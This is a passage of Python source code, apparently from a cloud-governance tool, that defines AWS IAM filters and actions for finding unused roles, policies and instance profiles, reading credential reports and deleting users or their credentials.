        return [r['IamInstanceProfile'] for r in manager.resources() if (
            'IamInstanceProfile' in r)]
    def scan_ec2_roles(self):
        # Instance profile names of non-terminated ec2 instances.
        manager = self.manager.get_resource_manager('ec2')
        results = []
        for e in manager.resources():
            # do not include instances that have been recently terminated
            if e['State']['Name'] == 'terminated':
                continue
            profile_arn = e.get('IamInstanceProfile', {}).get('Arn', None)
            if not profile_arn:
                continue
            # split arn to get the profile name
            results.append(profile_arn.split('/')[-1])
        return results
###################
# IAM Roles #
###################
@Role.filter_registry.register('used')
class UsedIamRole(IamRoleUsage):
    """Filter IAM roles on whether they are referenced by services.
    Checks for usage on EC2, Lambda, ECS only.
    :example:
    .. code-block:: yaml
        policies:
          - name: iam-role-in-use
            resource: iam-role
            filters:
              - type: used
                state: true
    """
    schema = type_schema(
        'used',
        state={'type': 'boolean'})
    def process(self, resources, event=None):
        # A role counts as used when either its arn or name appears in
        # the service usage scan.
        in_use = self.service_role_usage()
        if self.data.get('state', True):
            return [r for r in resources
                    if r['Arn'] in in_use or r['RoleName'] in in_use]
        return [r for r in resources
                if r['Arn'] not in in_use and r['RoleName'] not in in_use]
@Role.filter_registry.register('unused')
class UnusedIamRole(IamRoleUsage):
    """Filter IAM roles not referenced by EC2, Lambda, or ECS.
    Deprecated: prefer the 'used' filter with ``state: false``.
    :example:
    .. code-block:: yaml
        policies:
          - name: iam-roles-not-in-use
            resource: iam-role
            filters:
              - type: used
                state: false
    """
    schema = type_schema('unused')
    def process(self, resources, event=None):
        # Delegate to the `used` filter with state inverted.
        delegate = UsedIamRole({'state': False}, self.manager)
        return delegate.process(resources)
@Role.filter_registry.register('cross-account')
class RoleCrossAccountAccess(CrossAccountAccessFilter):
    """Flag roles whose trust policy grants access outside the account."""
    # Evaluate the role's trust (assume role) policy document.
    policy_attribute = 'AssumeRolePolicyDocument'
    permissions = ('iam:ListRoles',)
    schema = type_schema(
        'cross-account',
        # white list accounts
        whitelist_from=ValuesFrom.schema,
        whitelist={'type': 'array', 'items': {'type': 'string'}})
@Role.filter_registry.register('has-inline-policy')
class IamRoleInlinePolicy(Filter):
    """Filter IAM roles by the presence of inline policies.
    True: roles carrying at least one inline policy
    False: roles carrying no inline policy
    :example:
    .. code-block:: yaml
        policies:
          - name: iam-roles-with-inline-policies
            resource: iam-role
            filters:
              - type: has-inline-policy
                value: True
    """
    schema = type_schema('has-inline-policy', value={'type': 'boolean'})
    permissions = ('iam:ListRolePolicies',)
    def _inline_policies(self, client, resource):
        # Annotate the role with the names of its inline policies.
        resource['c7n:InlinePolicies'] = client.list_role_policies(
            RoleName=resource['RoleName'])['PolicyNames']
        return resource
    def process(self, resources, event=None):
        client = local_session(self.manager.session_factory).client('iam')
        want = self.data.get('value', True)
        matched = []
        for resource in resources:
            self._inline_policies(client, resource)
            has_inline = len(resource['c7n:InlinePolicies']) > 0
            if want and has_inline:
                matched.append(resource)
            elif not want and not has_inline:
                matched.append(resource)
        return matched
@Role.filter_registry.register('has-specific-managed-policy')
class SpecificIamRoleManagedPolicy(Filter):
    """Filter IAM roles carrying a specific attached managed policy.
    For example, to find all roles with 'admin-policy' attached:
    :example:
    .. code-block:: yaml
        policies:
          - name: iam-roles-have-admin
            resource: iam-role
            filters:
              - type: has-specific-managed-policy
                value: admin-policy
    """
    schema = type_schema('has-specific-managed-policy', value={'type': 'string'})
    permissions = ('iam:ListAttachedRolePolicies',)
    def _managed_policies(self, client, resource):
        # Names of the managed policies attached to the role.
        attached = client.list_attached_role_policies(
            RoleName=resource['RoleName'])['AttachedPolicies']
        return [p['PolicyName'] for p in attached]
    def process(self, resources, event=None):
        client = local_session(self.manager.session_factory).client('iam')
        target = self.data.get('value')
        if not target:
            # Without a policy name nothing can match.
            return []
        return [r for r in resources
                if target in self._managed_policies(client, r)]
@Role.filter_registry.register('no-specific-managed-policy')
class NoSpecificIamRoleManagedPolicy(Filter):
    """Filter IAM roles missing a specific attached managed policy.
    For example, to find all roles without 'ip-restriction' attached:
    :example:
    .. code-block:: yaml
        policies:
          - name: iam-roles-no-ip-restriction
            resource: iam-role
            filters:
              - type: no-specific-managed-policy
                value: ip-restriction
    """
    schema = type_schema('no-specific-managed-policy', value={'type': 'string'})
    permissions = ('iam:ListAttachedRolePolicies',)
    def _managed_policies(self, client, resource):
        # Names of the managed policies attached to the role.
        attached = client.list_attached_role_policies(
            RoleName=resource['RoleName'])['AttachedPolicies']
        return [p['PolicyName'] for p in attached]
    def process(self, resources, event=None):
        client = local_session(self.manager.session_factory).client('iam')
        target = self.data.get('value')
        if not target:
            # Without a policy name nothing can match.
            return []
        return [r for r in resources
                if target not in self._managed_policies(client, r)]
@Role.action_registry.register('set-policy')
class SetPolicy(BaseAction):
    """Attach or detach a managed IAM policy (identified by arn) on a role.
    A ``"*"`` arn with ``state: detached`` detaches every attached policy.
    :example:
    .. code-block:: yaml
            - name: iam-attach-role-policy
              resource: iam-role
              filters:
                - type: no-specific-managed-policy
                  value: my-iam-policy
              actions:
                - type: set-policy
                  state: detached
                  arn: "*"
                - type: set-policy
                  state: attached
                  arn: arn:aws:iam::123456789012:policy/my-iam-policy
    """
    schema = type_schema(
        'set-policy',
        state={'enum': ['attached', 'detached']},
        arn={'type': 'string'},
        required=['state', 'arn'])
    permissions = ('iam:AttachRolePolicy', 'iam:DetachRolePolicy',)
    def validate(self):
        # Attaching "everything" is meaningless; only detach supports '*'.
        if self.data.get('state') == 'attached' and self.data.get('arn') == "*":
            raise PolicyValidationError(
                '* operator is not supported for state: attached on %s' % (
                    self.manager.data))
    def process(self, resources):
        client = local_session(self.manager.session_factory).client('iam')
        arn = self.data['arn']
        state = self.data['state']
        for role in resources:
            if state == 'attached':
                client.attach_role_policy(
                    RoleName=role['RoleName'],
                    PolicyArn=arn)
            elif state == 'detached':
                try:
                    if arn == "*":
                        self.detach_all_policies(client, role)
                    else:
                        client.detach_role_policy(
                            RoleName=role['RoleName'],
                            PolicyArn=arn)
                except client.exceptions.NoSuchEntityException:
                    # Role or policy vanished since the resource query.
                    continue
    def detach_all_policies(self, client, resource):
        # Detach every managed policy currently attached to the role.
        role_name = resource['RoleName']
        attached = client.list_attached_role_policies(
            RoleName=role_name)['AttachedPolicies']
        for policy in attached:
            client.detach_role_policy(
                RoleName=role_name, PolicyArn=policy.get('PolicyArn'))
@Role.action_registry.register('delete')
class RoleDelete(BaseAction):
    """Delete an IAM Role.
    With ``force: true`` attached managed policies are detached first
    so the delete can succeed.
    :example:
    .. code-block:: yaml
            - name: iam-delete-unused-role
              resource: iam-role
              filters:
                - type: usage
                  match-operator: all
                  LastAuthenticated: null
              actions:
                - type: delete
                  force: true
    """
    schema = type_schema('delete', force={'type': 'boolean'})
    permissions = ('iam:DeleteRole',)
    def process(self, resources):
        client = local_session(self.manager.session_factory).client('iam')
        if self.data.get('force', False):
            # Detach all attached policies up front via the set-policy action.
            detach = self.manager.action_registry['set-policy'](
                {'state': 'detached', 'arn': '*'}, self.manager)
            detach.process(resources)
        last_error = None
        for role in resources:
            try:
                client.delete_role(RoleName=role['RoleName'])
            except client.exceptions.DeleteConflictException as e:
                # Still has attachments; remember and surface after the loop
                # so remaining roles are still processed.
                self.log.warning(
                    "Role:%s cannot be deleted, set force to detach policy and delete"
                    % role['Arn'])
                last_error = e
            except (client.exceptions.NoSuchEntityException,
                    client.exceptions.UnmodifiableEntityException):
                continue
        if last_error:
            raise last_error
######################
# IAM Policies #
######################
@Policy.filter_registry.register('used')
class UsedIamPolicies(Filter):
    """Filter IAM policies that are in use
    (attached to at least one entity, or serving as a permissions boundary).
    :example:
    .. code-block:: yaml
        policies:
          - name: iam-policy-used
            resource: iam-policy
          filters:
              - type: used
    """
    schema = type_schema('used')
    permissions = ('iam:ListPolicies',)
    def process(self, resources, event=None):
        def in_use(policy):
            return (policy['AttachmentCount'] > 0 or
                    policy.get('PermissionsBoundaryUsageCount', 0) > 0)
        return [p for p in resources if in_use(p)]
@Policy.filter_registry.register('unused')
class UnusedIamPolicies(Filter):
    """Filter IAM policies that are not in use
    (no attachments and no permissions boundary usage).
    :example:
    .. code-block:: yaml
        policies:
          - name: iam-policy-unused
            resource: iam-policy
            filters:
              - type: unused
    """
    schema = type_schema('unused')
    permissions = ('iam:ListPolicies',)
    def process(self, resources, event=None):
        unused = []
        for policy in resources:
            if (policy['AttachmentCount'] == 0 and
                    policy.get('PermissionsBoundaryUsageCount', 0) == 0):
                unused.append(policy)
        return unused
@Policy.filter_registry.register('has-allow-all')
class AllowAllIamPolicies(Filter):
    """Check if IAM policy resource(s) have allow-all IAM policy statement block.
    This allows users to implement CIS AWS check 1.24 which states that no
    policy must exist with the following requirements.
    Policy must have 'Action' and Resource = '*' with 'Effect' = 'Allow'
    The policy will trigger on the following IAM policy (statement).
    For example:
    .. code-block:: json
     {
         'Version': '2012-10-17',
         'Statement': [{
             'Action': '*',
             'Resource': '*',
             'Effect': 'Allow'
         }]
     }
    Additionally, the policy checks if the statement has no 'Condition' or
    'NotAction'.
    For example, if the user wants to check all used policies and filter on
    allow all:
    .. code-block:: yaml
     - name: iam-no-used-all-all-policy
       resource: iam-policy
       filters:
         - type: used
         - type: has-allow-all
    Note that scanning and getting all policies and all statements can take
    a while. Use it sparingly or combine it with filters such as 'used' as
    above.
    """
    schema = type_schema('has-allow-all')
    permissions = ('iam:ListPolicies', 'iam:ListPolicyVersions')
    def has_allow_all_policy(self, client, resource):
        # Pull the default version's document and scan its statements
        # for an unconditional Action:* / Resource:* / Effect:Allow grant.
        document = client.get_policy_version(
            PolicyArn=resource['Arn'],
            VersionId=resource['DefaultVersionId']
        )['PolicyVersion']['Document']
        statements = document['Statement']
        if isinstance(statements, dict):
            # Single-statement documents come back as a bare mapping.
            statements = [statements]
        for s in statements:
            if 'Condition' in s or 'Action' not in s or 'Resource' not in s:
                continue
            if not (isinstance(s['Action'], six.string_types) and
                    s['Action'] == "*"):
                continue
            if not (isinstance(s['Resource'], six.string_types) and
                    s['Resource'] == "*"):
                continue
            if s['Effect'] == "Allow":
                return True
        return False
    def process(self, resources, event=None):
        client = local_session(self.manager.session_factory).client('iam')
        matched = [r for r in resources if self.has_allow_all_policy(client, r)]
        self.log.info(
            "%d of %d iam policies have allow all.",
            len(matched), len(resources))
        return matched
@Policy.action_registry.register('delete')
class PolicyDelete(BaseAction):
    """Delete an IAM Policy.
    For example, to automatically delete all unused IAM policies:
    :example:
    .. code-block:: yaml
            - name: iam-delete-unused-policies
              resource: iam-policy
              filters:
                - type: unused
              actions:
                - delete
    """
    schema = type_schema('delete')
    permissions = ('iam:DeletePolicy',)
    def process(self, resources):
        client = local_session(self.manager.session_factory).client('iam')
        total = len(resources)
        # AWS managed policies (account id 'aws') can never be deleted.
        resources = [r for r in resources
                     if Arn.parse(r['Arn']).account_id != 'aws']
        if len(resources) != total:
            self.log.warning("Implicitly filtering AWS managed policies: %d -> %d",
                             total, len(resources))
        for policy in resources:
            if policy.get('DefaultVersionId', '') != 'v1':
                # Non-default versions must be deleted before the policy itself.
                for version in client.list_policy_versions(
                        PolicyArn=policy['Arn']).get('Versions'):
                    if version.get('IsDefaultVersion'):
                        continue
                    client.delete_policy_version(
                        PolicyArn=policy['Arn'], VersionId=version['VersionId'])
            client.delete_policy(PolicyArn=policy['Arn'])
###############################
# IAM Instance Profiles #
###############################
@InstanceProfile.filter_registry.register('used')
class UsedInstanceProfiles(IamRoleUsage):
    """Filter IAM profiles that are being used.
    :example:
    .. code-block:: yaml
        policies:
          - name: iam-instance-profiles-in-use
            resource: iam-profile
            filters:
              - type: used
    """
    schema = type_schema('used')
    def process(self, resources, event=None):
        # A profile is in use when either its arn or its name shows up
        # in the ec2/asg usage scan.
        in_use = self.instance_profile_usage()
        results = [p for p in resources
                   if p['Arn'] in in_use or p['InstanceProfileName'] in in_use]
        self.log.info(
            "%d of %d instance profiles currently in use." % (
                len(results), len(resources)))
        return results
@InstanceProfile.filter_registry.register('unused')
class UnusedInstanceProfiles(IamRoleUsage):
    """Filter IAM profiles that are not being used
    :example:
    .. code-block:: yaml
        policies:
          - name: iam-instance-profiles-not-in-use
            resource: iam-profile
            filters:
              - type: unused
    """
    schema = type_schema('unused')
    def process(self, resources, event=None):
        results = []
        profiles = self.instance_profile_usage()
        for r in resources:
            # BUGFIX: a profile is unused only when *neither* its arn nor
            # its name appears in the usage set ('and', the De Morgan dual
            # of the `used` filter's test). The previous 'or' flagged a
            # profile whenever just one identifier was absent, which is
            # nearly always true since the usage scan records only one of
            # the two forms.
            if (r['Arn'] not in profiles and
                    r['InstanceProfileName'] not in profiles):
                results.append(r)
        self.log.info(
            "%d of %d instance profiles currently not in use." % (
                len(results), len(resources)))
        return results
###################
# IAM Users #
###################
class CredentialReport(Filter):
    """Use IAM Credential report to filter users.
    The IAM Credential report aggregates multiple pieces of
    information on iam users. This makes it highly efficient for
    querying multiple aspects of a user that would otherwise require
    per user api calls.
    https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_getting-report.html
    For example if we wanted to retrieve all users with mfa who have
    never used their password but have active access keys from the
    last month
    .. code-block:: yaml
     - name: iam-mfa-active-keys-no-login
       resource: iam-user
       filters:
         - type: credential
           key: mfa_active
           value: true
         - type: credential
           key: password_last_used
           value: absent
         - type: credential
           key: access_keys.last_used
           value_type: age
           value: 30
           op: less-than
    Credential Report Transforms
    We perform some default transformations from the raw
    credential report. Sub-objects (access_key_1, cert_2)
    are turned into array of dictionaries for matching
    purposes with their common prefixes stripped.
    N/A values are turned into None, TRUE/FALSE are turned
    into boolean values.
    """
    schema = type_schema(
        'credential',
        value_type={'$ref': '#/definitions/filters_common/value_types'},
        key={'type': 'string',
             'title': 'report key to search',
             'enum': [
                 'user',
                 'arn',
                 'user_creation_time',
                 'password_enabled',
                 'password_last_used',
                 'password_last_changed',
                 'password_next_rotation',
                 'mfa_active',
                 'access_keys',
                 'access_keys.active',
                 'access_keys.last_used_date',
                 'access_keys.last_used_region',
                 'access_keys.last_used_service',
                 'access_keys.last_rotated',
                 'certs',
                 'certs.active',
                 'certs.last_rotated',
             ]},
        value={'$ref': '#/definitions/filters_common/value'},
        op={'$ref': '#/definitions/filters_common/comparison_operators'},
        report_generate={
            'title': 'Generate a report if none is present.',
            'default': True,
            'type': 'boolean'},
        report_delay={
            'title': 'Number of seconds to wait for report generation.',
            'default': 10,
            'type': 'number'},
        report_max_age={
            'title': 'Number of seconds to consider a report valid.',
            'default': 60 * 60 * 24,
            'type': 'number'})
    # Raw csv column prefixes that get folded into list-valued
    # sub-objects (see process_user_record).
    list_sub_objects = (
        ('access_key_1_', 'access_keys'),
        ('access_key_2_', 'access_keys'),
        ('cert_1_', 'certs'),
        ('cert_2_', 'certs'))
    # for access keys only
    matched_annotation_key = 'c7n:matched-keys'
    permissions = ('iam:GenerateCredentialReport',
                   'iam:GetCredentialReport')
    def get_value_or_schema_default(self, k):
        """Return the policy-supplied value for *k*, else its schema default."""
        if k in self.data:
            return self.data[k]
        return self.schema['properties'][k]['default']
    def get_credential_report(self):
        """Fetch, parse and cache the credential report keyed by user name."""
        report = self.manager._cache.get('iam-credential-report')
        if report:
            return report
        data = self.fetch_credential_report()
        report = {}
        # The api may return the csv content as bytes or text.
        if isinstance(data, six.binary_type):
            reader = csv.reader(io.StringIO(data.decode('utf-8')))
        else:
            reader = csv.reader(io.StringIO(data))
        headers = next(reader)
        for line in reader:
            info = dict(zip(headers, line))
            report[info['user']] = self.process_user_record(info)
        self.manager._cache.save('iam-credential-report', report)
        return report
    @classmethod
    def process_user_record(cls, info):
        """Type convert the csv record, modifies in place."""
        keys = list(info.keys())
        # Value conversion
        for k in keys:
            v = info[k]
            if v in ('N/A', 'no_information'):
                info[k] = None
            elif v == 'false':
                info[k] = False
            elif v == 'true':
                info[k] = True
        # Object conversion
        for p, t in cls.list_sub_objects:
            # Strip the column prefix and group into list sub-objects;
            # only active keys/certs are retained.
            obj = dict([(k[len(p):], info.pop(k))
                        for k in keys if k.startswith(p)])
            if obj.get('active', False):
                info.setdefault(t, []).append(obj)
        return info
    def fetch_credential_report(self):
        """Return raw report content, regenerating if stale or missing."""
        client = local_session(self.manager.session_factory).client('iam')
        try:
            report = client.get_credential_report()
        except ClientError as e:
            if e.response['Error']['Code'] != 'ReportNotPresent':
                raise
            report = None
        if report:
            # Discard reports older than report_max_age.
            threshold = datetime.datetime.now(tz=tzutc()) - timedelta(
                seconds=self.get_value_or_schema_default(
                    'report_max_age'))
            if not report['GeneratedTime'].tzinfo:
                # Compare naive-to-naive if the api returned a naive time.
                threshold = threshold.replace(tzinfo=None)
            if report['GeneratedTime'] < threshold:
                report = None
        if report is None:
            if not self.get_value_or_schema_default('report_generate'):
                raise ValueError("Credential Report Not Present")
            client.generate_credential_report()
            # Report generation is async; wait report_delay seconds
            # before fetching.
            time.sleep(self.get_value_or_schema_default('report_delay'))
            report = client.get_credential_report()
        return report['Content']
    def process(self, resources, event=None):
        # Base implementation only prepares the matcher config for
        # dotted (sub-object) keys; subclasses perform the actual
        # filtering and call match() per resource.
        if '.' in self.data['key']:
            self.matcher_config = dict(self.data)
            self.matcher_config['key'] = self.data['key'].split('.', 1)[1]
        return []
    def match(self, resource, info):
        """Evaluate one user's report record against the configured filter."""
        if info is None:
            return False
        k = self.data.get('key')
        if '.' not in k:
            # Simple top-level report attribute.
            vf = ValueFilter(self.data)
            vf.annotate = False
            return vf(info)
        # access key matching
        prefix, sk = k.split('.', 1)
        vf = ValueFilter(self.matcher_config)
        vf.annotate = False
        # annotation merging with previous respecting block operators
        k_matched = []
        for v in info.get(prefix, ()):
            if vf.match(v):
                k_matched.append(v)
        for k in k_matched:
            k['c7n:match-type'] = 'credential'
        self.merge_annotation(resource, self.matched_annotation_key, k_matched)
        return bool(k_matched)
@User.filter_registry.register('credential')
class UserCredentialReport(CredentialReport):
    """Credential report filter bound to iam users."""
    def process(self, resources, event=None):
        # Base class prepares the value matcher for dotted keys.
        super(UserCredentialReport, self).process(resources, event)
        report = self.get_credential_report()
        if report is None:
            return []
        matched = []
        for user in resources:
            info = report.get(user['UserName'])
            if not self.match(user, info):
                continue
            user['c7n:credential-report'] = info
            matched.append(user)
        return matched
@User.filter_registry.register('has-inline-policy')
class IamUserInlinePolicy(Filter):
    """
    Filter IAM users that have an inline-policy attached

    True: Filter users that have an inline-policy
    False: Filter users that do not have an inline-policy
    """

    schema = type_schema('has-inline-policy', value={'type': 'boolean'})
    permissions = ('iam:ListUserPolicies',)

    def _inline_policies(self, client, resource):
        # Annotate the user with its inline policy names.
        resource['c7n:InlinePolicies'] = client.list_user_policies(
            UserName=resource['UserName'])['PolicyNames']
        return resource

    def process(self, resources, event=None):
        client = local_session(self.manager.session_factory).client('iam')
        want_inline = self.data.get('value', True)
        matched = []
        for resource in resources:
            resource = self._inline_policies(client, resource)
            inline_count = len(resource['c7n:InlinePolicies'])
            if inline_count > 0 and want_inline:
                matched.append(resource)
            elif inline_count == 0 and not want_inline:
                matched.append(resource)
        return matched
@User.filter_registry.register('policy')
class UserPolicy(ValueFilter):
    """Filter IAM users based on attached policy values

    :example:

    .. code-block:: yaml

        policies:
          - name: iam-users-with-admin-access
            resource: iam-user
            filters:
              - type: policy
                key: PolicyName
                value: AdministratorAccess
    """

    schema = type_schema('policy', rinherit=ValueFilter.schema)
    schema_alias = False
    permissions = ('iam:ListAttachedUserPolicies',)

    def user_policies(self, user_set):
        # Fetch and cache full policy documents for a batch of users.
        client = local_session(self.manager.session_factory).client('iam')
        for user in user_set:
            policies = user.setdefault('c7n:Policies', [])
            attached = client.list_attached_user_policies(
                UserName=user['UserName'])['AttachedPolicies']
            for attachment in attached:
                policies.append(
                    client.get_policy(PolicyArn=attachment['PolicyArn'])['Policy'])

    def process(self, resources, event=None):
        with self.executor_factory(max_workers=2) as executor:
            self.log.debug(
                "Querying %d users policies" % len(resources))
            list(executor.map(self.user_policies, chunks(resources, size=50)))
        matched = []
        for resource in resources:
            hits = [p for p in resource['c7n:Policies'] if self.match(p)]
            if hits and resource not in matched:
                matched.append(resource)
        return matched
@User.filter_registry.register('group')
class GroupMembership(ValueFilter):
    """Filter IAM users based on attached group values

    :example:

    .. code-block:: yaml

        policies:
          - name: iam-users-in-admin-group
            resource: iam-user
            filters:
              - type: group
                key: GroupName
                value: Admins
    """

    schema = type_schema('group', rinherit=ValueFilter.schema)
    schema_alias = False
    permissions = ('iam:ListGroupsForUser',)

    def get_user_groups(self, client, user_set):
        # Annotate each user with its group memberships.
        for user in user_set:
            user['c7n:Groups'] = client.list_groups_for_user(
                UserName=user['UserName'])['Groups']

    def process(self, resources, event=None):
        client = local_session(self.manager.session_factory).client('iam')
        pending = [r for r in resources if 'c7n:Groups' not in r]
        with self.executor_factory(max_workers=2) as executor:
            futures = [
                executor.submit(self.get_user_groups, client, batch)
                for batch in chunks(pending, size=50)]
            for future in as_completed(futures):
                pass
        matched = []
        for resource in resources:
            hits = [g for g in resource.get('c7n:Groups', []) if self.match(g)]
            if hits and resource not in matched:
                matched.append(resource)
        return matched
@User.filter_registry.register('access-key')
class UserAccessKey(ValueFilter):
    """Filter IAM users based on access-key values
    :example:
    .. code-block:: yaml
        policies:
          - name: iam-users-with-active-keys
            resource: iam-user
            filters:
              - type: access-key
                key: Status
                value: Active
    """
    schema = type_schema('access-key', rinherit=ValueFilter.schema)
    schema_alias = False
    permissions = ('iam:ListAccessKeys',)
    # Cache of raw key metadata stored on each user resource.
    annotation_key = 'c7n:AccessKeys'
    # Where matched keys are recorded for downstream actions (remove-keys).
    matched_annotation_key = 'c7n:matched-keys'
    # Suppress ValueFilter's own annotation; matches are merged manually below.
    annotate = False
    def get_user_keys(self, client, user_set):
        # Populate the access-key cache for a batch of users, with retry.
        for u in user_set:
            u[self.annotation_key] = self.manager.retry(
                client.list_access_keys,
                UserName=u['UserName'])['AccessKeyMetadata']
    def process(self, resources, event=None):
        client = local_session(self.manager.session_factory).client('iam')
        with self.executor_factory(max_workers=2) as w:
            # Only query users not already annotated by an earlier filter.
            augment_set = [r for r in resources if self.annotation_key not in r]
            self.log.debug(
                "Querying %d users' api keys" % len(augment_set))
            list(w.map(
                functools.partial(self.get_user_keys, client),
                chunks(augment_set, 50)))
        matched = []
        for r in resources:
            k_matched = []
            for k in r[self.annotation_key]:
                if self.match(k):
                    k_matched.append(k)
            for k in k_matched:
                # Tag matches as coming from live api data (the 'credential'
                # filter tags its matches with 'c7n:match-type' instead).
                k['c7n:matched-type'] = 'access'
            self.merge_annotation(r, self.matched_annotation_key, k_matched)
            if k_matched:
                matched.append(r)
        return matched
# Mfa-device filter for iam-users
@User.filter_registry.register('mfa-device')
class UserMfaDevice(ValueFilter):
    """Filter iam-users based on mfa-device status

    :example:

    .. code-block:: yaml

        policies:
          - name: mfa-enabled-users
            resource: iam-user
            filters:
              - type: mfa-device
                key: UserName
                value: not-null
    """

    schema = type_schema('mfa-device', rinherit=ValueFilter.schema)
    schema_alias = False
    permissions = ('iam:ListMfaDevices',)

    def __init__(self, *args, **kw):
        super(UserMfaDevice, self).__init__(*args, **kw)
        # The filter always operates over the fetched device list.
        self.data['key'] = 'MFADevices'

    def process(self, resources, event=None):
        def _fetch_devices(resource):
            client = local_session(self.manager.session_factory).client('iam')
            resource['MFADevices'] = client.list_mfa_devices(
                UserName=resource['UserName'])['MFADevices']

        with self.executor_factory(max_workers=2) as executor:
            pending = [r for r in resources if 'MFADevices' not in r]
            self.log.debug(
                "Querying %d users' mfa devices" % len(pending))
            list(executor.map(_fetch_devices, pending))
        return [r for r in resources if self.match(r)]
@User.action_registry.register('post-finding')
class UserFinding(OtherResourcePostFinding):
    def format_resource(self, r):
        """Format the user for Security Hub.

        When the policy filtered on access keys, emit the first cached key
        as an AwsIamAccessKey resource; otherwise fall back to the parent
        class's generic formatting.
        """
        if any(filter(lambda x: isinstance(x, UserAccessKey), self.manager.iter_filters())):
            details = {
                # NOTE(review): 'UserName' is populated with the user's ARN —
                # confirm this matches the AwsIamAccessKey finding schema.
                "UserName": "arn:aws:iam:{}:user/{}".format(
                    self.manager.config.account_id, r["c7n:AccessKeys"][0]["UserName"]
                ),
                "Status": r["c7n:AccessKeys"][0]["Status"],
                "CreatedAt": r["c7n:AccessKeys"][0]["CreateDate"].isoformat(),
            }
            accesskey = {
                "Type": "AwsIamAccessKey",
                "Id": r["c7n:AccessKeys"][0]["AccessKeyId"],
                "Region": self.manager.config.region,
                # Drop empty values before shipping the finding.
                "Details": {"AwsIamAccessKey": filter_empty(details)},
            }
            return filter_empty(accesskey)
        else:
            return super(UserFinding, self).format_resource(r)
@User.action_registry.register('delete')
class UserDelete(BaseAction):
    """Delete a user or properties of a user.

    For example if you want to have a whitelist of valid (machine-)users
    and want to ensure that no users have been clicked without documentation.

    You can use both the 'credential' or the 'username'
    filter. 'credential' will have an SLA of 4h,
    (http://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_getting-report.html),
    but the added benefit of performing less API calls, whereas
    'username' will make more API calls, but have a SLA of your cache.

    :example:

    .. code-block:: yaml

        # using a 'credential' filter'
        - name: iam-only-whitelisted-users
          resource: iam-user
          filters:
            - type: credential
              key: user
              op: not-in
              value:
                - valid-user-1
                - valid-user-2
          actions:
            - delete

        # using a 'username' filter with 'UserName'
        - name: iam-only-whitelisted-users
          resource: iam-user
          filters:
            - type: value
              key: UserName
              op: not-in
              value:
                - valid-user-1
                - valid-user-2
          actions:
            - delete

        # using a 'username' filter with 'Arn'
        - name: iam-only-whitelisted-users
          resource: iam-user
          filters:
            - type: value
              key: Arn
              op: not-in
              value:
                - arn:aws:iam:123456789012:user/valid-user-1
                - arn:aws:iam:123456789012:user/valid-user-2
          actions:
            - delete

    Additionally, you can specify the options to delete properties of an iam-user,
    including console-access, access-keys, attached-user-policies,
    inline-user-policies, mfa-devices, groups,
    ssh-keys, signing-certificates, and service-specific-credentials.

    Note: using options will _not_ delete the user itself, only the items specified
    by ``options`` that are attached to the respective iam-user. To delete a user
    completely, use the ``delete`` action without specifying ``options``.

    :example:

    .. code-block:: yaml

        - name: delete-console-access-unless-valid
          comment: |
            finds iam-users with console access and deletes console access unless
            the username is included in whitelist
          resource: iam-user
          filters:
            - type: username
              key: UserName
              op: not-in
              value:
                - valid-user-1
                - valid-user-2
            - type: credential
              key: Status
              value: Active
          actions:
            - type: delete
              options:
                - console-access

        - name: delete-misc-access-for-iam-user
          comment: |
            deletes multiple options from test_user
          resource: iam-user
          filters:
            - UserName: test_user
          actions:
            - type: delete
              options:
                - mfa-devices
                - access-keys
                - ssh-keys
    """

    # Option name -> handler method, in the order handlers are invoked.
    ORDERED_OPTIONS = OrderedDict([
        ('console-access', 'delete_console_access'),
        ('access-keys', 'delete_access_keys'),
        ('attached-user-policies', 'delete_attached_user_policies'),
        ('inline-user-policies', 'delete_inline_user_policies'),
        ('mfa-devices', 'delete_hw_mfa_devices'),
        ('groups', 'delete_groups'),
        ('ssh-keys', 'delete_ssh_keys'),
        ('signing-certificates', 'delete_signing_certificates'),
        ('service-specific-credentials', 'delete_service_specific_credentials'),
    ])

    # Convenience aliases expanded into several ordered options.
    COMPOUND_OPTIONS = {
        'user-policies': ['attached-user-policies', 'inline-user-policies'],
    }

    schema = type_schema(
        'delete',
        options={
            'type': 'array',
            'items': {
                'type': 'string',
                'enum': list(ORDERED_OPTIONS.keys()) + list(COMPOUND_OPTIONS.keys()),
            }
        })

    permissions = (
        'iam:ListAttachedUserPolicies',
        'iam:ListAccessKeys',
        'iam:ListGroupsForUser',
        'iam:ListMFADevices',
        'iam:ListServiceSpecificCredentials',
        'iam:ListSigningCertificates',
        'iam:ListSSHPublicKeys',
        'iam:DeactivateMFADevice',
        'iam:DeleteAccessKey',
        'iam:DeleteLoginProfile',
        'iam:DeleteSigningCertificate',
        'iam:DeleteSSHPublicKey',
        'iam:DeleteUser',
        'iam:DeleteUserPolicy',
        'iam:DetachUserPolicy',
        'iam:RemoveUserFromGroup')

    @staticmethod
    def delete_console_access(client, r):
        """Remove the user's login profile (console password), if any."""
        try:
            client.delete_login_profile(
                UserName=r['UserName'])
        except ClientError as e:
            # Users without console access have no login profile to delete.
            if e.response['Error']['Code'] not in ('NoSuchEntity',):
                raise

    @staticmethod
    def delete_access_keys(client, r):
        """Delete every access key attached to the user."""
        response = client.list_access_keys(UserName=r['UserName'])
        for access_key in response['AccessKeyMetadata']:
            client.delete_access_key(UserName=r['UserName'],
                                     AccessKeyId=access_key['AccessKeyId'])

    @staticmethod
    def delete_attached_user_policies(client, r):
        """Detach every managed policy attached to the user."""
        response = client.list_attached_user_policies(UserName=r['UserName'])
        for user_policy in response['AttachedPolicies']:
            client.detach_user_policy(
                UserName=r['UserName'], PolicyArn=user_policy['PolicyArn'])

    @staticmethod
    def delete_inline_user_policies(client, r):
        """Delete every inline policy embedded in the user."""
        response = client.list_user_policies(UserName=r['UserName'])
        for user_policy_name in response['PolicyNames']:
            client.delete_user_policy(
                UserName=r['UserName'], PolicyName=user_policy_name)

    @staticmethod
    def delete_hw_mfa_devices(client, r):
        """Deactivate every MFA device assigned to the user."""
        response = client.list_mfa_devices(UserName=r['UserName'])
        for mfa_device in response['MFADevices']:
            client.deactivate_mfa_device(
                UserName=r['UserName'], SerialNumber=mfa_device['SerialNumber'])

    @staticmethod
    def delete_groups(client, r):
        """Remove the user from every group it belongs to."""
        response = client.list_groups_for_user(UserName=r['UserName'])
        for user_group in response['Groups']:
            client.remove_user_from_group(
                UserName=r['UserName'], GroupName=user_group['GroupName'])

    @staticmethod
    def delete_ssh_keys(client, r):
        """Delete every SSH public key uploaded by the user."""
        response = client.list_ssh_public_keys(UserName=r['UserName'])
        for key in response.get('SSHPublicKeys', ()):
            client.delete_ssh_public_key(
